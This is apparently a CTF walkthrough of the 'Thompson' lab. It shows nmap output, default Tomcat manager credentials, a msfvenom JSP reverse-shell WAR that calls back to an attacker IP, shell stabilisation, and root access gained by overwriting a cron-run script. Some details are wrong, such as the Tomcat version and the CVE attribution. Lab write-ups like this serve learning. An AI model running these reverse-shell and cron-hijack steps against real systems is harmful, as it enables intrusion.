Thompson

1. Started with an nmap scan

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|   256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
MAC Address: 02:B6:65:1B:84:7F (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1. Started the msfconsole
2. Checked the vulnerabilities with the ChatGPT
3. msfconsole was hard to use we use
4. exploit multi/http/tomcat_mgr_upload
5. set the Rhost
6. meterpreter as java/meterpreter/reverse_tcp
7. we can’t find the credentials
8. we go to the http://<ip>:8080
9. we get the tomcat apache 8.8.5 login page
10. we go to the manager app
11. it asks for the credentials (which we don’t have)
12. when we go to ‘cancel’ we get the login

• <user username="tomcat" password="s3cret" roles="manager-gui"/>

13. login with the credentials

14. creating a msfvenom payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.195.155 LPORT=4444 -f war > shell1.war

<aside> 💡

we created a payload by Googling the CVE of the tomcat 8.8.5 and found CVE-2017–12617 it is called WAR

</aside>

15. Upload that war file to http://<ip>:8080/manager/html after entering the credentials then select the shell/ directory with a listener port already on (connection recieved)

16. Let’s stabilize the shell with

python -c ‘import pty; pty.spawn(“/bin/bash”)’
ctrl+z(background the shell)
stty raw -echo
fg(foreground the shell)
stty size(for the rows and columns)
export TERM=xterm
export SHELL=/bin/bash
stty rows <rows> cols <columns>

17. cd /home → cd /jack → cat user.txt

18. there is an id.sh

19. we can access the id.sh but can’t su

20. let’s cat /etc/crontab we can see an id.sh which gets executed periodically

21. echo “cp /root/root.txt /home/jack/root.txt” > id. sh

22. this command gets executed and the root.txt is copied in the /home/jack/root.txt which we can cat and get the flag

Kistimaat !!!!!!!!!!!